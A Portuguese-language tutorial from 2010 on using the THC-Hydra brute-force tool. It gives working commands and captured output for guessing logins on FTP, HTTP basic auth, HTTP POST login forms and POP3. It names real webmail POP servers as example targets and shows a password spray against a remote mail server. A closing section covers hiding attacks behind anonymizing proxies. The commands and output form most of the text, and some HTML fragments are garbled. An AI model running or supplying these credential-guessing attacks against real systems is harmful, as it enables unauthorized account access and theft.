Tutorial Thc-Hydra
_ _ _ _
| |_| |__ ___ | |__ _ _ __| |_ __ __ _
| __| '_ \ / __|____| '_ \| | | |/ _` | '__/ _` |
| |_| | | | (_|_____| | | | |_| | (_| | | | (_| |
\__|_| |_|\___| |_| |_|\__, |\__,_|_| \__,_|
|___/ TUTORIAL BASICO THC-HYDRA [PT-BR]
_________________________________________________________________________________
- Por : MDH3LL
- Contato : [email protected]
- Data 10/04/2010
_________________________________________________________________________________
INDICE :
_________________________________________________________________________________
-0x00 - Instalando THC-HYDRA no (Windows XP).
-0x01 - Executando.
-0x02 - Opções.
-0x03 - Exemplos{
-- Exemplo (1) FTP
-- Exemplo (2) http-head
-- Exemplo (3) http-post-form
-- Exemplo (4) POP3
-0x04 - Proxy.
_________________________________________________________________________________
* THC-Hydra:Open Source/Multiplataforma/
* Desenvolvido por uma organização Alemã chamada "The Hacker's Choice"(THC).
* O Programa pode ser adquirido gratuitamente no site oficial do projeto : http://freeworld.thc.org/thc-hydra/
Hydra usa um mecanismo de FORÇA BRUTA/BRUTE FORCE (ou busca exaustiva):
Este tipo de ataque consiste em fazer o programa trabalhar exaustivamente tentando combinações de
senhas e nomes de usuários ate chegar ao seu objetivo obvio.
Protocolos suportados atualmente na versão 5.4:
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,
RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,
ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable
=================================================================================
[0x00] Instalando THC-HYDRA no (Windows XP) :
=================================================================================
O Primeiro passo é fazer o download da V.Win32/Cywin do programa no site oficial,descompactar e rodar.
-> Criar uma variável de ambiente em :
painel de controle > sistema > aba avançado > variáveis de ambiente e adicionando o caminho em path.
exemplo: C:\hydra-5.4-win;
=================================================================================
[0x01] Executando :
=================================================================================
Rode 'hydra' no prompt de comandos para chamar o programa.
/////////////////////////////////////////////////////////////////////////////////
C:\Documents and Settings\user\Desktop>hydra
Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]
Options:
-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, "n" for null password, "s" try login as pass
-C FILE colon seperated "login:pass" format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: telnet ftp pop3[-ntlm]
imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco
cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5
rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd
OPT some service modules need special input (see README!)
Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs - use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at http://www.thc.org
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Podemos ver acima que quando executado exibe informações como versão,sintaxe de uso e
as opções seguidas de comentários.
=================================================================================
[0x02] Opções :
=================================================================================
-R Restaura sessões abordadas/quebradas.
-S Conexão segura usando SSL caso seja necessário.
-s Especifica qual porta o hydra vai estabelecer a conexão.
-l Nome|login da vitima.
-L Carrega uma lista contendo nomes|logins de vitimas.(1 por linha)
-p Especifica senha única.
-P Carrega uma lista com senhas.(1 por linha)
-e ns adcional 'n' testa senha em branco || adicional 's' testa user como pass.
-C Usado para carregar um arquivo contendo usuário:senha. formato usuário:senha equivale a -L/-P.
-M Carrega lista de servidores alvos.(1 por linha)
-o Salva as senhas encontradas dentro do arquivo que você especificar.
-f Faz o programa parar de trabalhar quando a senha||usuário for encontrada[o].
-t Limita o numero de solicitações por vez.(default: 16)
-w Define o tempo máximo em segundos para esperar resposta do serv.(default: 30s)
-v / -V Modo verbose do programa. 'V' mostra todas tentativas.
Server: Servidor alvo.
Exemplos:
127.0.0.1
localhost
pop.gmail.com
pop.mail.yahoo.com.br
pop3.live.com
Service: Protocolo||Serviço que sera chamado|usado.
Exemplos:
pop3
ftp
smtp
vnc
imap
http-head
http-post-form
=================================================================================
[0x03] Exemplos:
=================================================================================
Colocarei na pratica as opções já explicadas no índice [0x02] deste tutorial.
Exemplo (1) FTP
=================================================================================
Sintaxe:
---------------------------------------------------------------------------------
hydra -l root -P pass.txt -s 21 localhost ftp
---------------------------------------------------------------------------------
Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-08-17 21:23:57
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 127.0.0.1 login: root password: chaw123
[STATUS] attack finished for localhost (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-08-17 21:24:34
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
*[21][ftp] host: 127.0.0.1 login: root password: chaw123 -> Esta saída mostra que foi encontrado a senha:chaw123
pertencente ao usuário root.
Exemplo (2) http-head
=================================================================================
Sintaxe:
---------------------------------------------------------------------------------
hydra -L users.txt -P pass.txt -o saida.txt localhost http-head /xampp/
---------------------------------------------------------------------------------
Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:40:56
[DATA] 16 tasks, 1 servers, 266 login tries (l:14/p:19), ~16 tries per task
[DATA] attacking service http-head on port 80
[80][www] host: 127.0.0.1 login: root password: Est2yu
[STATUS] attack finished for localhost (waiting for childs to finish)
select: Bad file descriptor
Hydra (http://www.thc.org) finished at 2010-01-28 00:41:00
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
O Hydra encontrou usuario:root||senha:Est2yu e fez o favor de salvar no arquivo 'saida.txt'.
Dentro do arquivo foi escrito as seguintes linhas pelo programa:
---------------------------------------------------------------------------------
# Hydra v5.4 run at 2010-01-27 19:59:59 on localhost http-head (hydra -L users.txt -P
pass.txt -o saida.txt localhost http-head)
[80][www] host: 127.0.0.1 login: root password: Est2yu
---------------------------------------------------------------------------------
/xammp/ é o caminho/path -> http://localhost/xammp/
Exemplo (3) http-post-form
=================================================================================
Sintaxe:
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1
http-post-form "index.php:nome=^USER^&senha=^PASS^:invalido"
---------------------------------------------------------------------------------
Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-27 23:19:33
[DATA] 1 tasks, 1 servers, 19 login tries (l:1/p:19), ~19 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1 login: admin password: admin
[STATUS] attack finished for 127.0.0.1 (valid pair found)
Hydra (http://www.thc.org) finished at 2010-01-27 23:19:33
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
-> Para criar esta sintaxe tive que olhar o código da pagina >>
---------------------------------------------------------------------------------
---------------------------------------------------------------------------------
__________________________________________________________
|__Mozilla Firefox___________________________________|-|_|X|
| |
| |
| |
| |
| _____________________________________ |
| | nome | |
| |_____________________________________| |
| _____________________________________ |
| | senha | |
| |_____________________________________| |
| |
| ________________ |
| | Enviar | |
| |________________| |
| |
|__________________________________________________________|
|_Concluído________________________________________________|
-> POST index.php nome=^USER^&senha=^PASS^&boo=Enviar
-> Use o complemento 'live HTTP headers' para Firefox que com toda certeza facilitara bastante sua vida.
-> Quando envio dados errados a pagina me retorna 'invalido' no titulo.
---------------------------------------------------------------------------------
invalido
---------------------------------------------------------------------------------
Complete ->
---------------------------------------------------------------------------------
hydra -l [usuário] -P [lista-senhas] -o saida.txt -t 1 -f [host] http-post-form
"[destino]:[nome_da_variável]=^USER^&[nome_da_variável]=^PASS^:[frase de erro]"
---------------------------------------------------------------------------------
Completo ->
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1 http-post-form "index.php:nome=^USER^&senha=^PASS^:invalido"
---------------------------------------------------------------------------------
Sendo que ^USER^ e ^PASS^ sera completado pelo hydra durante o loop que ele vai fazer testando senha por senha.
-> ^USER^ = admin e ^PASS^ = $_ <- -="" exemplo="" outro=""> http://localhost/login/login.html
-> Codigo fonte da pagina >>
---------------------------------------------------------------------------------
---------------------------------------------------------------------------------
Sintaxe:
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt localhost http-post-form "/login/login_vai.php:login=^USER^&senha=^PASS^:Senha inválida!"
---------------------------------------------------------------------------------
Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-04-11 00:31:02
[DATA] 1 tasks, 1 servers, 11 login tries (l:1/p:11), ~11 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1 login: admin password: teste
[STATUS] attack finished for localhost (valid pair found)
Hydra (http://www.thc.org) finished at 2010-04-11 00:31:07
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Exemplo (4) POP3
=================================================================================
Sintaxe:
---------------------------------------------------------------------------------
hydra -L users.txt -p 123456 -S pop3.xxx.com pop3
---------------------------------------------------------------------------------
Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:55:28
[DATA] 9 tasks, 1 servers, 9 login tries (l:9/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop3.xxx.com (waiting for childs to finish)
[110][pop3] host: pop3.xxx.com login: [email protected] password: 123456
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
=================================================================================
[0x04] Proxy:
=================================================================================
Proxy web:
---------------------------------------------------------------------------------
HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
---------------------------------------------------------------------------------
Para qualquer outro use : HYDRA_PROXY_CONNECT
---------------------------------------------------------------------------------
HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
---------------------------------------------------------------------------------
Com autentificação :
---------------------------------------------------------------------------------
HYDRA_PROXY_AUTH="nome:senha"
---------------------------------------------------------------------------------->